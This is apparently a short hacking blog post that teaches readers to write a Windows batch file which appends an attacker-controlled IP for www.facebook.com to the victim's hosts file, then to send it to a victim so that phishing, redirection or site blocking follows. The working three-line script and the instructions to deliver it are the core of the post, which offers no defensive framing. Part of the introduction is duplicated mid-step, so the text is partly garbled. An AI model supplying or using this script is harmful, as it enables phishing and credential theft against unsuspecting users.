Hey guys!
Today we are up with a simple method to change victim's host details. This will be useful for you if you are going to do phishing attack to victim. So let's begin :P....
1. Open "Notepad".
2. Copy and Paste following line in it. Today we are up with a simple method to change victim's host details. This will be useful for you if you are going to do phishing attack to victim. So let's begin :P....
1. Open "Notepad".
@echo off
echo 120.xx.xx.xxx www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
3. Save file as "filename.bat". (replace filename by any name)Done!! Now send that file to victim and victim will suffer from redirecting, blocking of sites or phishing :P
0 comments:
Post a Comment